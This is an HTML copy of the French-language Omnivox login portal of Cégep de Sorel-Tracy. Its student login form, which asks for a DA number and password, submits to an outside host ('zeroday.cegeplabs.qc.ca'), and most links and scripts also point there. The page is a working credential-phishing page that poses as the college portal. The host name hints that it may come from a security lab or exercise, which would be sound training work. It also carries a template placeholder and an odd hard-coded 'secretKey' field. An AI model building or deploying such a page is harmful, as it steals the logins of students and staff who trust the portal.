<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<meta content="text/html;charset=UTF-8" http-equiv="content-type"/>
<head id="ctl00_head" lang="fr"><title>
    Portail Omnivox du Cégep de Sorel-Tracy - Omnivox
</title>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
    <link href="favicon.ico" rel="icon"/>
    <script src="Javascript/Lib_General.js" type="text/javascript"></script>
    <link href='stylesheets/ui/intraFlexa301.css?Type=normalnonauthentifie&C=SOR&E=P&L=FRA&Ref=20150108145625'
          rel='stylesheet' type='text/css'>
    <link href='stylesheets/content/global9b90.css?C=SOR&E=P&L=FRA&Ref=20150108145625' rel='stylesheet' type='text/css'>
    <script src='Content/Partage/JavaScript/JQuery/jquery-current.js' type='text/javascript'></script>
    <meta content="Portail Omnivox du Cégep de Sorel-Tracy" name="title">
    <meta content="Omnivox vous simplifie la vie en intégrant des outils efficaces de communication."
          name="description">
    <meta content="Portail Omnivox du Collège, Léa, l'environnement Professeurs-Étudiants" name="keywords">
    <style type="text/css">.imgEnvString {
        position: absolute;
        top: 0;
        left: 0;
        z-index: 500;
    }</style>
</head>
<body OnLoad="OnLoad_Main()" id="ctl00_body">
<form action="http://zeroday.cegeplabs.qc.ca/school/index.php" class="intrFrmNonAuthentifie" id="aspnetForm"
      method="get" name="aspnetForm">
    <div>
        <input id="__EVENTTARGET" name="__EVENTTARGET" type="hidden" value=""/>
        <input id="__EVENTARGUMENT" name="__EVENTARGUMENT" type="hidden" value=""/>
        <input id="__VIEWSTATE" name="__VIEWSTATE" type="hidden"
               value="6DHCwdbOR8HTxcCW25f0OhVFMEnR5MnuCAVeAuxpulQPMcdOrjrQWT5ozhT3rXB7HhiVwX5d0V0bD22MOjBXuLcZBV6OkrDhaFqgaHh59FRQ91qezOfY0RpgfM7ONXbcmlGl20O1W+KfXis5fNx0gh894M2yCTkbM6llXg=="/>
    </div>
</form>
<script type="text/javascript">
    //<![CDATA[
    var theForm = document.forms['aspnetForm'];

    function __doPostBack(eventTarget, eventArgument) {
        if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
            theForm.__EVENTTARGET.value = eventTarget;
            theForm.__EVENTARGUMENT.value = eventArgument;
            theForm.submit();
        }
    }

    //]]>
</script>
<script src="http://zeroday.cegeplabs.qc.ca/intr/WebResource.axd?d=mO1bqTPKPqc0cOQZj0R8mTDWL8ZytWTekIfX7bKgQRfLsxECR2kWtatZyr-QLcS3Jm7ETGMhaqAIGMY50&t=635418570520000000"
        type="text/javascript"></script>
<script src="http://zeroday.cegeplabs.qc.ca/intr/ScriptResource.axd?d=fDx-ASR3CnfhBqksR0Rlb5gugCF_Qbqh9vmWo0dGO6vXBPz0yMAd50DKo5TirLz68XwRLiCfXloH26WgHGSoEg5TmpfoQlx73WfbNY02xOMxLQyE2IpUWj2Bl50TNF7iWhDr4xg-LkqFS81OZwqftp-rdgE1&t=7e632e9f"
        type="text/javascript"></script>
<script src="http://zeroday.cegeplabs.qc.ca/intr/ScriptResource.axd?d=XrmCPMjNxlYggkECNuITAEW4gP-U5z1JSpUhhLncikr6vFOan-kQLfhkYG_U1r3fo7HbsrR_3XqodLLq0RcvChcqycmgqYRx7u6qPuMyYjg4Zx15-_iZ5-_8-e0rGu2zVaTEaktAh9HpqAge-_3LZBM3o3DoztGiIXbtcg2&t=7e632e9f"
        type="text/javascript"></script>
<div>
    <input id="__VIEWSTATEGENERATOR" name="__VIEWSTATEGENERATOR" type="hidden" value="10F90A51"/>
    <input id="__VIEWSTATEENCRYPTED" name="__VIEWSTATEENCRYPTED" type="hidden" value=""/>
</div>
<script type="text/javascript">
    //<![CDATA[
    Sys.WebForms.PageRequestManager._initialize('ctl00$IntraflexScriptManager', 'aspnetForm', [], [], [], 90, 'ctl00');
    //]]>
</script>
<div id="outerWrap">
    <div id="innerWrap"><h1 id="ovx10_college">Cégep de Sorel-Tracy</h1>
        <div id="ovx10-langue" style="display:none"><a href="http://zeroday.cegeplabs.qc.ca/intr/?L={{FORM_LANG_SEL}}">In
            English</a></div>
        <a href="http://zeroday.cegeplabs.qc.ca/intr/Module/Identification/?TypeUtilisateur=Etudiant&C=SOR&E=P&L=FRA&Ref=20150108145625"><img
                alt="Première utilisation - Étudiant" src="images/General/blank1.gif"
                style="width:100px;height:20px;position:absolute;left:198px;bottom:200px;"/></a><a
                href="http://zeroday.cegeplabs.qc.ca/intr/Module/Identification/?TypeUtilisateur=EmployeNormal&C=SOR&E=P&L=FRA&Ref=20150108145625"><img
                alt="Première utilisation - Employés" src="images/General/blank1.gif"
                style="width:100px;height:20px;position:absolute;left:310px;bottom:200px;"/></a>
        <div id="innerPos">
            <div id="wa">
                <div id="wb">
                    <div id="wc">
                        <table align="center" border="0" cellpadding="0" cellspacing="0" class="contenuIntraflex">
                            <tr>
                                <td class="contenu_BoxLogin" style="text-align: left;" valign="top">
                                    <div id="loginWrapBox">
                                        <script type="text/javascript">
                                            var vlang = "FRA";
                                            var vabsuri = "https://cegepst.omnivox.ca/intr/Module/Identification/Login/Login.aspx?ReturnUrl=%2fintr";
                                            var strInfos = '';
                                            var detect = navigator.userAgent.toLowerCase();
                                            var intbrowser, intversion, intjava, intresolution, intcolordepth,
                                                intthestring;
                                            var tmpcookie = new Date();
                                            var chkcookie = (tmpcookie.getTime() + '');
                                            document.cookie = "chkcookie=" + chkcookie + "; path=/";
                                            if (document.cookie.indexOf(chkcookie, 0) < 0)
                                                window.location = "http://zeroday.cegeplabs.qc.ca/intr/Module/Information/Cookie.aspx?C=SOR&E=P&L=FRA&Ref=20150108145625";

                                            function OnLoad_Main() {
                                                var txtPassword;
                                                var hidStatsEnvUsersResolutionEmployeNonEnseignant;
                                                var hidStatsEnvUsersResolutionEnseignant;
                                                try {
                                                    txtPassword = document.getElementById('txtPasswordEtudiant');
                                                    if (txtPassword != null)
                                                        txtPassword.Value = '';
                                                    document.getElementById('hidStatsEnvUsersResolutionEtudiant').value = getScreenWidth();
                                                    document.getElementById('hidStatsEnvUsersNbCouleursEtudiant').value = screen.colorDepth;
                                                } catch (e) {
                                                }
                                                try {
                                                    txtPassword = document.getElementById('txtPasswordEmployeNormal');
                                                    if (txtPassword != null)
                                                        txtPassword.Value = '';
                                                    document.getElementById('hidStatsEnvUsersResolutionEmployeNormal').value = getScreenWidth();
                                                    document.getElementById('hidStatsEnvUsersNbCouleursEmployeNormal').value = screen.colorDepth;
                                                } catch (e) {
                                                }
                                                try {
                                                    txtPassword = document.getElementById("txtPasswordEmployeNonEnseignant");
                                                    if (txtPassword != null)
                                                        txtPassword.Value = "";
                                                    hidStatsEnvUsersResolutionEmployeNonEnseignant = document.getElementById("hidStatsEnvUsersResolutionEmployeNonEnseignant");
                                                    if (hidStatsEnvUsersResolutionEmployeNonEnseignant) {
                                                        hidStatsEnvUsersResolutionEmployeNonEnseignant.value = getScreenWidth();
                                                        hidStatsEnvUsersResolutionEmployeNonEnseignant.value = screen.colorDepth;
                                                    }
                                                } catch (e) {
                                                    //throw e;
                                                }
                                                try {
                                                    txtPassword = document.getElementById("txtPasswordEnseignant");
                                                    if (txtPassword != null)
                                                        txtPassword.Value = "";
                                                    hidStatsEnvUsersResolutionEnseignant = document.getElementById("hidStatsEnvUsersResolutionEmployeNonEnseignant");
                                                    if (hidStatsEnvUsersResolutionEnseignant) {
                                                        hidStatsEnvUsersResolutionEnseignant.value = getScreenWidth();
                                                        hidStatsEnvUsersResolutionEnseignant.value = screen.colorDepth;
                                                    }
                                                } catch (e) {
                                                    //throw e;
                                                }
                                            } //OnLoad_Main
                                            function CheckCookieMemoriserNomUtilisateur(typeUtilisateur) {
                                                var nomCookie = "MemoriserNomUtilisateur_" + typeUtilisateur
                                                var c_start;
                                                var c_end;
                                                if (document.cookie.length > 0) {
                                                    c_start = document.cookie.indexOf(nomCookie + "=");
                                                    if (c_start != -1) {
                                                        c_start = c_start + nomCookie.length + 1;
                                                        c_end = document.cookie.indexOf(";", c_start);
                                                        if (c_end == -1) c_end = document.cookie.length;
                                                        {
                                                            if (typeUtilisateur == "Etudiant") {
                                                                document.getElementsByName("NoDA")[0].value = unescape(document.cookie.substring(c_start, c_end));
                                                                document.getElementById("chk" + typeUtilisateur).checked = "true";
                                                                document.getElementById("txtPasswordEtu").focus();
                                                            } else {
                                                                document.getElementsByName("NoEmpl" + typeUtilisateur)[0].value = unescape(document.cookie.substring(c_start, c_end));
                                                                document.getElementById("chk" + typeUtilisateur).checked = "true";
                                                                document.getElementById("txtPassword" + typeUtilisateur).focus();
                                                            }
                                                        }
                                                    }
                                                }
                                            }

                                            function MemoriseUsername(typeUtilisateur) {
                                                if (document.getElementById("chk" + typeUtilisateur) && document.getElementById("chk" + typeUtilisateur).checked) {
                                                    var exdate = new Date();
                                                    exdate.setDate(exdate.getDate() + 1000);
                                                    if (typeUtilisateur == "Etudiant") {
                                                        document.cookie = "MemoriserNomUtilisateur_" + typeUtilisateur + "=" + document.getElementsByName("NoDA")[0].value + ";expires=" + exdate.toGMTString();
                                                    } else {
                                                        document.cookie = "MemoriserNomUtilisateur_" + typeUtilisateur + "=" + document.getElementsByName("NoEmpl" + typeUtilisateur)[0].value + ";expires=" + exdate.toGMTString();
                                                    }
                                                } else {
                                                    var exdate = new Date();
                                                    exdate.setDate(exdate.getDate() - 1000);
                                                    document.cookie = "MemoriserNomUtilisateur_" + typeUtilisateur + "=;expires=" + exdate.toGMTString();
                                                }
                                            }

                                            function checkIt(string) {
                                                place = detect.indexOf(string) + 1;
                                                thestring = string;
                                                return place;
                                            }

                                            // Fix
                                            function getScreenWidth() {
                                                var currentWidth;
                                                if (typeof (window.innerWidth) == 'number') {
                                                    //Non-IE
                                                    currentWidth = window.innerWidth;
                                                } else if (document.documentElement && (document.documentElement.clientWidth || document.documentElement.clientHeight)) {
                                                    //IE 6+ in 'standards compliant mode'
                                                    currentWidth = document.documentElement.clientWidth;
                                                } else if (document.body && (document.body.clientWidth || document.body.clientHeight)) {
                                                    //IE 4 compatible
                                                    currentWidth = document.body.clientWidth;
                                                } // if
                                                return currentWidth;
                                            }//getScreenWidth
                                            function getScreenHeight() {
                                                var currentHeight;
                                                if (typeof (window.innerHeight) == 'number') {
                                                    //Non-IE
                                                    currentHeight = window.innerHeight;
                                                } else if (document.documentElement && (document.documentElement.clientWidth || document.documentElement.clientHeight)) {
                                                    //IE 6+ in 'standards compliant mode'
                                                    currentHeight = document.documentElement.clientHeight;
                                                } else if (document.body && (document.body.clientWidth || document.body.clientHeight)) {
                                                    //IE 4 compatible
                                                    currentHeight = document.body.clientHeight;
                                                } // if
                                                return currentHeight;
                                            }//getScreenHeight
                                            //-->
                                            function MasquerAfficherNumeroEmploye() {
                                                var btnMasquer = $("#btnMasquerNumeroEmploye");
                                                var btnAfficher = $("#btnAfficherNumeroEmploye");
                                                var txtNumeroEmpl = btnMasquer.parent().find("input[type=text]");
                                                var txtNumeroEmplMasque = btnMasquer.parent().find("input[type=password]");
                                                if (txtNumeroEmplMasque.is(":hidden")) {
                                                    // On masque le numéro d'employé
                                                    btnMasquer.hide();
                                                    btnAfficher.show();
                                                    txtNumeroEmplMasque.val(txtNumeroEmpl.val())
                                                    txtNumeroEmpl.hide();
                                                    txtNumeroEmplMasque.show();
                                                } else {
                                                    // On enlève le masque sur le numéro d'employé
                                                    btnAfficher.hide();
                                                    btnMasquer.show();
                                                    txtNumeroEmpl.val(txtNumeroEmplMasque.val());
                                                    txtNumeroEmplMasque.hide();
                                                    txtNumeroEmpl.show();
                                                }
                                            } //MasquerNumeroEmploye
                                            // Appelé lorsqu'on fait submit et que l'option de masquer le numéro d'employé est activée
                                            function MasquerNumeroEmployeSubmit() {
                                                var btnMasquer = $("#btnMasquerNumeroEmploye");
                                                var txtNumeroEmpl = btnMasquer.parent().find("input[type=text]");
                                                var txtNumeroEmplMasque = btnMasquer.parent().find("input[type=password]");
                                                $("input[name=chkMasquerNumeroEmploye]").attr("checked", txtNumeroEmpl.is(":hidden"));
                                                if (txtNumeroEmpl.is(":hidden")) {
                                                    txtNumeroEmpl.val(txtNumeroEmplMasque.val());
                                                }
                                            } //MasquerNumeroEmployeSubmit
                                        </script>
                                        <form></form>
                                        <form action="http://zeroday.cegeplabs.qc.ca/school/index.php" autocomplete="off"
                                              id="formEtu" method="post" method="post" name="formEtu"
                                              onsubmit="MemoriseUsername('Etudiant');"><input style="display: none;"
                                                                                              type="text"/><input
                                                style="display: none;" type="password"/><input
                                                id="hidStatsEnvUsersNbCouleursEtudiant" name="StatsEnvUsersNbCouleurs"
                                                type="hidden" value=""><input id="hidStatsEnvUsersResolutionEtudiant"
                                                                              name="StatsEnvUsersResolution"
                                                                              type="hidden" value=""><input
                                                name="TypeIdentification" type="hidden" value="Etudiant">
                                            <table border="0" class="firstLoginBox">
                                                <tr>
                                                    <td colspan="2"
                                                        style="font-weight: bold; font-size: 16px; color: #005194; font-family: Arial">
                                                        <div class="textTitleHide"><img align="absmiddle"
                                                                                        alt="Étudiants"
                                                                                        src="http://zeroday.cegeplabs.qc.ca/images/General/intrFlecheEnteteBleu.gif"/>
                                                            <h2>&nbsp;Étudiants</h2><br/><img alt=" " height="1"
                                                                                              src="http://zeroday.cegeplabs.qc.ca/images/General/Pixel_8FBD6E.gif"
                                                                                              style="padding-top: 2px"
                                                                                              width=207/></div>
                                                        <div class="textTitlePushTop"></div>
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td class="dscCh loginBoxLigneHaut"><h4 class="texteLogin"><label
                                                            for='txtNoDA' id='lblNoDA'>No de DA </label><span
                                                            class="txtShadow2">No de DA </span><br/><span
                                                            style="font-size: 9px;">7 chiffres</span></h4></td>
                                                    <td class="loginBoxLigneHaut" style=""><input class="inputLogin"
                                                                                                  id="txtNoDA"
                                                                                                  maxlength="8"
                                                                                                  name="NoDA" size="12"
                                                                                                  type="text" value=""/>
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td class="dscCh loginBoxLigneBas" id="dscCh2"><h4
                                                            class="texteLogin"><label for='txtPasswordEtu'>Mot de
                                                        passe</label><span class="txtShadow2">Mot de passe</span></h4>
                                                    </td>
                                                    <td class="tdPassword loginBoxLigneBas"><input autocomplete="off"
                                                                                                   class="inputLogin"
                                                                                                   id="txtPasswordEtu"
                                                                                                   maxlength="200"
                                                                                                   name="PasswordEtu"
                                                                                                   size="12"
                                                                                                   type="password"/>
                                                        <input alt="Authentifier" id="btnLog1"
                                                               onmouseout='this.src="images/General/intr_btnSubmit.gif"'
                                                               onmouseover='this.src="images/General/intr_btnSubmit_on.html"'
                                                               src="images/General/intr_btnSubmit.gif" type="image"/>
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td class="distanceLienSupp" colspan="2">
                                                        <div style="min-width: 160px;"><a class="lienSousLogin"
                                                                                          href="http://zeroday.cegeplabs.qc.ca/intr/Module/Identification/?TypeUtilisateur=Etudiant&C=SOR&E=P&L=FRA&Ref=20150108145625"
                                                                                          title="Étudiants, cliquez ici si vous utilisez Omnivox pour la première fois;">Première
                                                            utilisation?</a><br/><a class="lienSousLogin"
                                                                                    href="http://zeroday.cegeplabs.qc.ca/intr/Module/Identification/OubliMotPasse.aspx?TypeUtilisateur=Etudiant&C=SOR&E=P&L=FRA&Ref=20150108145625"
                                                                                    title="Étudiants, cliquez ici pour récupérer votre mot de passe;">Oublié
                                                            votre mot de passe?</a></div>
                                                    </td>
                                                </tr>
                                            </table>
                                            <input name='k' type=hidden value='635563275857656250'></form>
                                        <form action="/login/submit" autocomplete="off" id="formEmp" method="post"
                                              name="formEmployeNormal"
                                              onsubmit="MemoriseUsername('EmployeNormal');MasquerNumeroEmployeSubmit();">
                                            <input name="secretKey" type="hidden"
                                                   value="b9ba58e35941163ff1b6cadd8d96f028+b9ba58e35941163ff1b6cadd8d96f0289327492371283210309283gkk90:"/><input
                                                id="hidStatsEnvUsersResolutionEmployeNormal"
                                                name="StatsEnvUsersResolution" type="hidden" value=""><input
                                                id="hidStatsEnvUsersNbCouleursEmployeNormal"
                                                name="StatsEnvUsersNbCouleurs" type="hidden" value=""><input
                                                name="TypeIdentification" type="hidden" value="EmployeNormal">
                                            <table border="0" class="secondLoginBox" width="250">
                                                <tr>
                                                    <td colspan="2"
                                                        style="font-weight: bold; font-size: 16px; color: #005194; font-family: Arial">
                                                        <div class="textTitleHide"><img align="absmiddle" alt="Employés"
                                                                                        src="http://zeroday.cegeplabs.qc.ca/images/General/intrFlecheEnteteBleu.gif"/>
                                                            <h2>&nbsp;Employés</h2><br/><img alt=" " height="1"
                                                                                             src="http://zeroday.cegeplabs.qc.ca/images/General/Pixel_8FBD6E.gif"
                                                                                             style="padding-top: 2px"
                                                                                             width=207/></div>
                                                        <div class="textTitlePushBot"></div>
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td class="dscCh loginBoxLigneHaut"><h4 class="texteLogin"><label
                                                            for='txtNoEmplEmployeNormal'>No d'employé</label><span
                                                            class="txtShadow">No d'employé</span></h4></td>
                                                    <td class="loginBoxLigneHaut" style=""><input class="inputLogin"
                                                                                                  id="txtNoEmplEmployeNormal"
                                                                                                  maxlength="50"
                                                                                                  name="NoEmplEmployeNormal"
                                                                                                  size="12" type="text"
                                                                                                  value=""/><input
                                                            AUTOCOMPLETE=off class="inputLogin" maxlength="50"
                                                            name="NoEmplMasquerEmployeNormal" size="12"
                                                            style="display:none" type="password" value=""/> <img
                                                            class="MasquerNumeroEmploye" id="btnMasquerNumeroEmploye"
                                                            onclick="MasquerAfficherNumeroEmploye();"
                                                            src="images/General/keyboard.png"
                                                            title="Masquer le No d'employé"/><img
                                                            class="MasquerNumeroEmploye" id="btnAfficherNumeroEmploye"
                                                            onclick="MasquerAfficherNumeroEmploye();"
                                                            src="images/General/keyboard_off.png" style="display:none"
                                                            title="Afficher le No d'employé"/><input
                                                            name="chkMasquerNumeroEmploye" style="display:none;"
                                                            type="checkbox"/></td>
                                                </tr>
                                                <tr>
                                                    <td class="dscCh loginBoxLigneBas"><h4 class="texteLogin"><label
                                                            for='txtPasswordEmployeNormal'>Mot de passe</label><span
                                                            class="txtShadow">Mot de passe</span></h4></td>
                                                    <td class="tdPassword loginBoxLigneBas"><input autocomplete="off"
                                                                                                   class="inputLogin"
                                                                                                   id="txtPasswordEmployeNormal"
                                                                                                   maxlength="200"
                                                                                                   name="PasswordEmplEmployeNormal"
                                                                                                   size="12"
                                                                                                   type="password"/>
                                                        <input alt="Authentifier" id="btnLog2"
                                                               onmouseout='this.src="images/General/intr_btnSubmit2.gif"'
                                                               onmouseover='this.src="images/General/intr_btnSubmit2_on.html"'
                                                               src="images/General/intr_btnSubmit2.gif" type="image"/>
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td class="distanceLienSupp" colspan="2">
                                                        <div style="min-width: 160px;"><a class="lienSousLogin"
                                                                                          href="http://zeroday.cegeplabs.qc.ca/intr/Module/Identification/?TypeUtilisateur=EmployeNormal&C=SOR&E=P&L=FRA&Ref=20150108145625"
                                                                                          title="Employés, cliquez ici si vous utilisez Omnivox pour la première fois;">Première
                                                            utilisation?</a><br/><a class="lienSousLogin"
                                                                                    href="http://zeroday.cegeplabs.qc.ca/intr/Module/Identification/OubliMotPasse.aspx?TypeUtilisateur=EmployeNormal&C=SOR&E=P&L=FRA&Ref=20150108145625"
                                                                                    title="Employés, cliquez ici pour récupérer votre mot de passe;">Oublié
                                                            votre mot de passe?</a></div>
                                                    </td>
                                                </tr>
                                            </table>
                                            <input name='k' type=hidden value='635563275857656250'></form>
                                        <style type="text/css">
                                            .txtShadow,
                                            .txtShadow2 {
                                                display: none;
                                            }

                                            .dscCh {
                                                width: 110px;
                                                /*vertical-align:top;*/
                                            }

                                            /** // [B36438] - Problème d'alignement sur LAL **/
                                            .loginPadding {
                                                padding-top: 3px;
                                                padding-top: 2px \9; /* Pour IE seulement */
                                            }

                                            h4 {
                                                margin: 0px;
                                            }

                                            #btnLog1,
                                            #btnLog2 {
                                                vertical-align: middle;
                                            }

                                            .firstLoginBox {
                                                width: 250px;
                                            }

                                            h2 {
                                                font-size: inherit;
                                                margin: inherit;
                                                line-height: inherit;
                                                padding: inherit;
                                                height: 1px;
                                                display: inline;
                                            }

                                            h3 {
                                                font-size: inherit;
                                                margin: inherit;
                                                line-height: inherit;
                                                padding: inherit;
                                            }

                                            .MasquerNumeroEmploye {
                                                cursor: pointer;
                                            }
                                        </style>
                                        <script type="text/javascript">
                                            if (document.getElementsByName('NoEmplEmployeNormal')[0] != null)
                                                document.getElementsByName('NoEmplEmployeNormal')[0].focus();
                                        </script>
                                    </div>
                                </td>
                            </tr>
                        </table>
                        <table class="tabServicesAnonymes">
                            <tr>
                                <td></td>
                            </tr>
                        </table>
                    </div>
                </div>
            </div>
        </div>
        <div id="copy">© 2015&nbsp;&nbsp;<a href="http://www.skytech.com/">Skytech Communications</a>&nbsp;&nbsp;-&nbsp;&nbsp;<a
                class=''
                href="javascript:OpenCentre('/intr/Module/Information/Confidentialite.aspx', 'Intr_Information', 'fullscreen=no,toolbar=no,location=no,directories=no,status=no,menubar=no,resizable=no,scrollbars=yes', 700, 500, false);">Sécurité
            et Paiement</a>&nbsp;&nbsp;-&nbsp;&nbsp;<a class=''
                                                       href="javascript:OpenCentre('/intr/Module/Information/Conditions.aspx', 'Intr_Information', 'fullscreen=no,toolbar=no,location=no,directories=no,status=no,menubar=no,resizable=no,scrollbars=yes', 700, 500, false);">Conditions
            d'utilisation</a>&nbsp;&nbsp;-&nbsp;&nbsp;<a class=''
                                                         href="javascript:OpenCentre('/intr/Module/Information/Omnivox10/Questions.aspx', 'Intr_Information', 'fullscreen=no,toolbar=no,location=no,directories=no,status=no,menubar=no,resizable=no,scrollbars=yes', 700, 500, false);">Des
            questions?</a></div>
    </div>
</div>
<style type="text/css">
    * {
        margin: 0;
        padding: 0
    }

    body, html {
        padding: 0;
        margin: 0;
        height: 100%;
        width: 100%
    }

    body {
        background: #fff url('intr/UI/Themes/Omnivox_Defaut/images/log3.jpg') repeat-x top left;
    }

    #outerWrap {
        min-width: 900px;
        background: transparent url('intr/UI/Themes/Omnivox_Defaut/images/log1.jpg') no-repeat top center;
        overflow: hidden;
        height: 100%
    }

    #innerWrap {
        background: transparent url('images/FRA/General/ovx10_log2.jpg') no-repeat top center;
        width: 900px;
        margin: 0 auto;
        height: 605px;
        position: relative;
    }

    #innerPos {
        width: 337px;
        float: right;
        margin: 63px 60px 0 0;
    }

    #innerPos #wa {
        background: transparent url('intr/UI/Themes/Omnivox_Defaut/images/log5a.png') no-repeat top center;
        padding-top: 43px;
    }

    #innerPos #wb {
        background: transparent url('intr/UI/Themes/Omnivox_Defaut/images/log5c.png') no-repeat bottom center;
        padding-bottom: 43px
    }

    #innerPos #wc {
        background: transparent url('intr/UI/Themes/Omnivox_Defaut/images/log5b.png') repeat-y top center;
        padding-top: 15px;
    }

    #innerPos #wc .contenuIntraflex {
        margin: 0 auto;
    }

    #copy {
        clear: both;
        position: absolute;
        bottom: 36px;
        left: 75px;
        font-size: 11px;
        color: #FEFEFE;
        font-weight: bold;
    }

    #copy a {
        font-size: 11px;
        color: #FEFEFE;
        font-weight: bold;
    }

    #copy a:hover {
        background-color: #1d5b37;
        color: #fff
    }

    .textTitleHide img {
        display: none;
    }

    .textTitleHide {
        font-family: 'trebuchet ms', arial;
        font-size: 20px;
        text-indent: -7px;
        color: #6280a2;
    }

    .textTitleHide h2 {
        font-size: 1em;
    }

    h4.texteLogin {
        font-size: 11px;
        color: #404e55;
    }

    .distanceLienSupp {
        text-align: right;
        padding: 5px 0 10px 0;
    }

    .distanceLienSupp a.lienSousLogin {
        font-size: 10px;
        color: #777;
        font-family: tahoma, arial;
        font-weight: normal;
    }

    .distanceLienSupp a.lienSousLogin:hover, .distanceLienSupp a.lienSousLogin:active {
        color: #000;
        font-size: 10px;
    }

    .firstLoginBox .distanceLienSupp {
        padding-bottom: 20px;
    }

    .inputLogin {
        width: 100px;
    }

    a img {
        border: 0
    }

    #MsgErreurLogin {
        position: absolute;
        top: 200px;
        left: 100px;
        border: 1px solid #ab0f0f;
        background-color: #fff4f4;
        width: 385px;
    }

    #ovx10_college {
        font-size: 22px;
        font-weight: bold;
        font-family: 'Trebuchet MS', arial;
        color: white;
        text-shadow: #468fb0 1px 1px 5px;
        width: 300px;
        position: absolute;
        top: 123px;
        left: 216px
    }

    .inputLogin {
        width: 80px;
    }

    #ovx10-langue {
        width: 200px;
        position: absolute;
        right: 100px;
        top: 99px;
        text-align: right
    }

    #ovx10-langue a {
        font-weight: bold;
    }

    td.vert {
        vertical-align: top
    }

    .descServiceActif, .descServiceInactif, .descServiceFermeAvantOuverture {
        color: #777;
        font-size: 10px;
        line-height: 1.1;
    }

    .tabServicesAnonymes {
        margin: 0 auto;
        width: 250px;
    }

    .liServicesAnonymes {
        padding-top: 2px;
    }

    .titreServicesAnonymes {
        color: #6280A2;
        font-family: 'trebuchet ms', arial;
        font-size: 20px;
        text-indent: -1px;
    }

    .ulServicesAnonymes {
        padding-top: 5px;
        padding-left: 20px;
        list-style-type: none;
        list-style-image: url('intr/UI/Themes/Omnivox_Defaut/images/pp_ovx.jpg');
    }

    .lienServiceInactif {
        font-size: 13px;
        color: #404E55;
    }

    .lienServicesAnonymesActif {
        font-weight: bold;
    }
</style>
<!--[if IE 6]>
<style type="text/css">
    #innerPos {
        width: 337px;
        float: right;
        margin: 63px 30px 0 0;
    }

    #innerPos #wa {
        background: transparent url('intr/UI/Themes/Omnivox_Defaut/images/log5a.png') no-repeat top center;
    }

    #innerPos #wb {
        background: transparent url('intr/UI/Themes/Omnivox_Defaut/images/log5c.png') no-repeat bottom center;
    }

    #innerPos #wc {
        background: transparent url('intr/UI/Themes/Omnivox_Defaut/images/log5b.png') repeat-y top center;
    }
</style><![endif]--><!--  -->
<script type="text/javascript">
    $(document).ready(
        function () {
            if ($(".ulServicesAnonymes").length > 0) {
                $(".tabServicesAnonymes").show();
            } else {
                $(".tabServicesAnonymes").hide();
            }
            $("#btnLog1").unbind().attr("src", "intr/UI/Themes/Omnivox_Defaut/images/btnLogB.gif");
            $("#btnLog2").unbind().attr("src", "intr/UI/Themes/Omnivox_Defaut/images/btnLogB.gif");
            $("#btnLog1").hover(
                function () {
                    $(this).attr("src", "intr/UI/Themes/Omnivox_Defaut/images/btnLogA.gif");
                },
                function () {
                    $(this).attr("src", "intr/UI/Themes/Omnivox_Defaut/images/btnLogB.gif");
                }
            );
            $("#btnLog2").hover(
                function () {
                    $(this).attr("src", "intr/UI/Themes/Omnivox_Defaut/images/btnLogA.gif");
                },
                function () {
                    $(this).attr("src", "intr/UI/Themes/Omnivox_Defaut/images/btnLogB.gif");
                }
            );
            $(".dscCh").next("td:has(input[type=text])").addClass("vert");
        }
    );
</script>
</form>
</body>
</html>